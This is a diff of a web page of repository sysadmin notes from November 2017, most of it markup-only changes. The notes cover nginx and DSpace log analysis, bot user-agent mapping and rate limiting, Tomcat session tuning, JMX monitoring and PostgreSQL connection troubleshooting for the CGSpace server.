</code></pre><h2 id="2017-11-08">2017-11-08</h2>
<ul>
@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Linode sent another alert about CPU usage in the morning at 6:12AM</li>
<li>Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;0[78]/Nov/2017:&quot; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;0[78]/Nov/2017:&#34; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
24981
</code></pre><ul>
<li>This is about 20,000 Tomcat sessions:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59&#39; | sort | uniq | wc -l
20733
</code></pre><ul>
<li>I&rsquo;m getting really sick of this</li>
@ -496,16 +496,16 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Some clients send thousands of requests without a user agent which ends up creating thousands of Tomcat sessions, wasting precious memory, CPU, and database resources in the process</li>
<li>Basically, we modify the nginx config to add a mapping with a modified user agent <code>$ua</code>:</li>
</ul>
<pre><code>map $remote_addr $ua {
<pre tabindex="0"><code>map $remote_addr $ua {
# 2017-11-08 Random Chinese host grabbing 20,000 PDFs
124.17.34.59 'ChineseBot';
124.17.34.59 &#39;ChineseBot&#39;;
default $http_user_agent;
}
</code></pre><ul>
<li>If the client&rsquo;s address matches then the user agent is set, otherwise the default <code>$http_user_agent</code> variable is used</li>
<li>Then, in the server&rsquo;s <code>/</code> block we pass this header to Tomcat:</li>
</ul>
<pre><code>proxy_pass http://tomcat_http;
<pre tabindex="0"><code>proxy_pass http://tomcat_http;
proxy_set_header User-Agent $ua;
</code></pre><ul>
<li>Note to self: the <code>$ua</code> variable won&rsquo;t show up in nginx access logs because the default <code>combined</code> log format doesn&rsquo;t show it, so don&rsquo;t run around pulling your hair out wondering why the modified user agents aren&rsquo;t showing in the logs!</li>
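<li>If I ever do want to see the mapped value I could define a custom log format that logs <code>$ua</code> instead of <code>$http_user_agent</code>; a sketch, not something currently deployed:</li>
</ul>
<pre tabindex="0"><code>log_format ua_mapped '$remote_addr - $remote_user [$time_local] '
                     '"$request" $status $body_bytes_sent '
                     '"$http_referer" "$ua"';
access_log /var/log/nginx/access.log ua_mapped;
</code></pre><ul>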
@ -516,14 +516,14 @@ proxy_set_header User-Agent $ua;
<li>I merged the clickable thumbnails code to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/347">#347</a>) and will deploy it later along with the new bot mapping stuff (and re-run the Ansible <code>nginx</code> and <code>tomcat</code> tags)</li>
<li>I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in <code>robots.txt</code>:</li>
</ul>
<pre><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
22229
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
0
</code></pre><ul>
<li>It seems that they rarely even bother checking <code>robots.txt</code>, but Google does multiple times per day!</li>
</ul>
<pre><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
14
# zgrep Googlebot /var/log/nginx/access.log* | grep -c robots.txt
1134
@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
<ul>
<li>Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;09/Nov/2017&#39; | grep -c 104.196.152.243
8956
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
223
</code></pre><ul>
<li>Versus the same stats for yesterday and the day before:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;08/Nov/2017&#39; | grep -c 104.196.152.243
10216
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2592
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep &#39;07/Nov/2017&#39; | grep -c 104.196.152.243
8120
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
3506
</code></pre><ul>
<li>The number of sessions is over <em>ten times less</em>!</li>
@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure templates</a> to be a little more modular and flexible</li>
<li>Looking at the top client IPs on CGSpace so far this morning, even though it&rsquo;s only been eight hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;12/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;12/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
243 5.83.120.111
335 40.77.167.103
424 66.249.66.91
@ -583,27 +583,27 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>5.9.6.51 seems to be a Russian bot:</li>
</ul>
<pre><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &quot;GET /handle/10568/16515/recent-submissions HTTP/1.1&quot; 200 5097 &quot;-&quot; &quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;
<pre tabindex="0"><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &#34;GET /handle/10568/16515/recent-submissions HTTP/1.1&#34; 200 5097 &#34;-&#34; &#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;
</code></pre><ul>
<li>What&rsquo;s amazing is that it seems to reuse its Java session across all requests:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2017-11-12
1558
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>Bravo to MegaIndex.ru!</li>
<li>The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat&rsquo;s Crawler Session Manager valve regex should match &lsquo;YandexBot&rsquo;:</li>
</ul>
<pre><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &quot;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&quot; 200 972019 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &#34;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&#34; 200 972019 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2017-11-12
991
</code></pre><ul>
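<li>For reference, that valve is a one-liner in Tomcat&rsquo;s <code>server.xml</code>; a sketch with the default regex (the path and exact attributes here are assumptions, not copied from CGSpace):</li>
</ul>
<pre tabindex="0"><code># grep -A1 CrawlerSessionManagerValve /etc/tomcat7/server.xml
      &lt;Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
             crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*" /&gt;
</code></pre><ul>
<li>The default regex should indeed match &ldquo;YandexBot&rdquo;, which is what makes the 991 sessions above so puzzling</li>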
<li>Move some items and collections on CGSpace for Peter Ballantyne, running <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move_collections.sh</code></a> with the following configuration:</li>
</ul>
<pre><code>10947/6 10947/1 10568/83389
<pre tabindex="0"><code>10947/6 10947/1 10568/83389
10947/34 10947/1 10568/83389
10947/2512 10947/1 10568/83389
</code></pre><ul>
@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
<li>The solution <a href="https://github.com/ilri/rmg-ansible-public/commit/f0646991772660c505bea9c5ac586490e7c86156">I came up with</a> uses tricks from both of those</li>
<li>I deployed the limit on CGSpace and DSpace Test and it seems to work well:</li>
</ul>
<pre><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 503 Service Temporarily Unavailable
Connection: keep-alive
Content-Length: 206
@ -642,9 +642,9 @@ Server: nginx
<ul>
<li>At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 200 &quot;
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 200 &#34;
1132
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 503 &quot;
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 503 &#34;
10105
</code></pre><ul>
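<li>The actual config is in the Ansible infrastructure templates, but the gist of the rate limit is something like this sketch (zone size, rate, and burst are example values):</li>
</ul>
<pre tabindex="0"><code># only Baidu requests get a non-empty key, so only they are rate limited
map $http_user_agent $baidu_limit {
    default        '';
    ~*Baiduspider  $binary_remote_addr;
}
limit_req_zone $baidu_limit zone=baidu:10m rate=1r/s;

# and then in the XMLUI location block:
limit_req zone=baidu burst=5;
</code></pre><ul>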
<li>Helping Sisay proof 47 records for IITA: <a href="https://dspacetest.cgiar.org/handle/10568/97029">https://dspacetest.cgiar.org/handle/10568/97029</a></li>
@ -675,7 +675,7 @@ Server: nginx
<li>Started testing DSpace 6.2 and a few things have changed</li>
<li>Now PostgreSQL needs <code>pgcrypto</code>:</li>
</ul>
<pre><code>$ psql dspace6
<pre tabindex="0"><code>$ psql dspace6
dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>Also, local settings are no longer in <code>build.properties</code>, they are now in <code>local.cfg</code></li>
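<li>A minimal <code>local.cfg</code> for a local test instance only needs a handful of overrides, something like this (values are just examples):</li>
</ul>
<pre tabindex="0"><code>dspace.dir = /home/aorth/dspace6
dspace.hostname = localhost
dspace.baseUrl = http://localhost:8080
db.url = jdbc:postgresql://localhost:5432/dspace6
db.username = dspace6
db.password = dspace6
</code></pre><ul>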
@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>After a few minutes the connections went down to 44 and CGSpace was kinda back up; it seems like Tsega restarted Tomcat</li>
<li>Looking at the REST and XMLUI log files, I don&rsquo;t see anything too crazy:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
13 66.249.66.223
14 207.46.13.36
17 207.46.13.137
@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
1400 70.32.83.92
1503 50.116.102.77
6037 45.5.184.196
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
325 139.162.247.24
354 66.249.66.223
422 207.46.13.36
@ -721,7 +721,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>I need to look into using JMX to analyze active sessions I think, rather than looking at log files</li>
<li>After adding appropriate <a href="https://geekflare.com/enable-jmx-tomcat-to-monitor-administer/">JMX listener options to Tomcat&rsquo;s JAVA_OPTS</a> and restarting Tomcat, I can connect remotely using an SSH dynamic port forward (SOCKS) on port 7777 for example, and then start jconsole locally like:</li>
</ul>
<pre><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
</code></pre><ul>
<li>Looking at the MBeans you can drill down in Catalina→Manager→webapp→localhost→Attributes and see active sessions, etc</li>
<li>I want to enable JMX listener on CGSpace but I need to do some more testing on DSpace Test and see if it causes any performance impact, for example</li>
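<li>For the record, the listener options and the SSH dynamic forward are along these lines (ports and hostname are examples, not the exact CGSpace settings):</li>
</ul>
<pre tabindex="0"><code># on the server: append something like this to Tomcat's JAVA_OPTS and restart Tomcat
-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9000
-Dcom.sun.management.jmxremote.rmi.port=9000 -Dcom.sun.management.jmxremote.ssl=false
-Dcom.sun.management.jmxremote.authenticate=false -Djava.rmi.server.hostname=localhost
# on my workstation: open the SOCKS proxy that the jconsole invocation above uses
$ ssh -D 7777 -N dspacetest.cgiar.org
</code></pre><ul>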
@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>Linode sent an alert that CGSpace was using a lot of CPU around 4 to 6 AM</li>
<li>Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;19/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;19/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
111 66.249.66.155
171 5.9.6.51
188 54.162.241.40
@ -751,12 +751,12 @@ dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>66.249.66.153 appears to be Googlebot:</li>
</ul>
<pre><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &quot;GET /handle/10568/2203 HTTP/1.1&quot; 200 6309 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &#34;GET /handle/10568/2203 HTTP/1.1&#34; 200 6309 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;
</code></pre><ul>
<li>We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity</li>
<li>In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)</li>
</ul>
<pre><code>$ wc -l dspace.log.2017-11-19
<pre tabindex="0"><code>$ wc -l dspace.log.2017-11-19
388472 dspace.log.2017-11-19
$ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
267494
@ -764,7 +764,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>WTF is this process doing every day, and for so many hours?</li>
<li>In unrelated news, when I was looking at the DSpace logs I saw a bunch of errors like this:</li>
</ul>
<pre><code>2017-11-19 03:00:32,806 INFO org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
<pre tabindex="0"><code>2017-11-19 03:00:32,806 INFO org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
2017-11-19 03:00:32,807 ERROR org.apache.pdfbox.filter.FlateFilter @ FlateFilter: stop reading corrupt stream due to a DataFormatException
</code></pre><ul>
<li>It&rsquo;s been a few days since I enabled the G1GC on DSpace Test and the JVM graph definitely changed:</li>
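<li>For the record, enabling it is just a flag in Tomcat&rsquo;s <code>JAVA_OPTS</code>, along these lines (heap sizes are just example values):</li>
</ul>
<pre tabindex="0"><code>JAVA_OPTS="-Djava.awt.headless=true -Xms3g -Xmx3g -XX:+UseG1GC -Dfile.encoding=UTF-8"
</code></pre><ul>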
@ -780,13 +780,13 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<ul>
<li>Magdalena was having problems logging in via LDAP and it seems to be a problem with the CGIAR LDAP server:</li>
</ul>
<pre><code>2017-11-21 11:11:09,621 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
<pre tabindex="0"><code>2017-11-21 11:11:09,621 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
</code></pre><h2 id="2017-11-22">2017-11-22</h2>
<ul>
<li>Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM</li>
<li>The logs don&rsquo;t show anything particularly abnormal between those hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;22/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;22/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
136 31.6.77.23
174 68.180.229.254
217 66.249.66.91
@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM</li>
<li>I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
88 66.249.66.91
140 68.180.229.254
155 54.196.2.131
@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
</code></pre><ul>
<li>&hellip; and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
5 190.120.6.219
6 104.198.9.108
14 104.196.152.243
@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>These IPs crawling the REST API don&rsquo;t specify user agents and I&rsquo;d assume they are creating many Tomcat sessions</li>
<li>I would catch them in nginx to assign a &ldquo;bot&rdquo; user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they don&rsquo;t seem to create any really, at least not in the dspace.log:</li>
</ul>
<pre><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>I&rsquo;m wondering if REST works differently, or just doesn&rsquo;t log these sessions?</li>
@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)</li>
<li>I also noticed that CGNET appears to be monitoring the old domain every few minutes:</li>
</ul>
<pre><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &quot;HEAD / HTTP/1.1&quot; 301 0 &quot;-&quot; &quot;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&quot;
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &#34;HEAD / HTTP/1.1&#34; 301 0 &#34;-&#34; &#34;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&#34;
</code></pre><ul>
<li>I should probably tell CGIAR people to have CGNET stop that</li>
</ul>
@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM</li>
<li>Yet another mystery because the load for all domains looks fine at that time:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;26/Nov/2017:0[567]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;26/Nov/2017:0[567]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 66.249.66.83
195 104.196.152.243
220 40.77.167.82
@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>About an hour later Uptime Robot said that the server was down</li>
<li>Here are all the top XMLUI and REST users from today:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;29/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;29/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
540 66.249.66.83
659 40.77.167.36
663 157.55.39.214
@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>I don&rsquo;t see much activity in the logs but there are 87 PostgreSQL connections</li>
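<li>I count those with a quick query on the server (modulo a few psql header lines), something like:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * FROM pg_stat_activity;' | wc -l
</code></pre><ul>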
<li>But shit, there were 10,000 unique Tomcat sessions today:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
10037
</code></pre><ul>
<li>Although maybe that&rsquo;s not much, as the previous two days had more:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
12377
$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
16984
</code></pre><ul>
<li>I think we just need to start increasing the number of allowed PostgreSQL connections instead of fighting this, as it&rsquo;s the most common source of crashes we have</li>
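<li>That means bumping PostgreSQL&rsquo;s <code>max_connections</code> and DSpace&rsquo;s pool size together; hypothetical example values, not what is currently deployed:</li>
</ul>
<pre tabindex="0"><code># postgresql.conf
max_connections = 200

# dspace.cfg
db.maxconnections = 70
db.maxwait = 5000
db.maxidle = 20
</code></pre><ul>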
@ -944,15 +944,15 @@ $ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | u
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ The logs say &ldquo;Timeout waiting for idle object&rdquo;
PostgreSQL activity says there are 115 connections currently
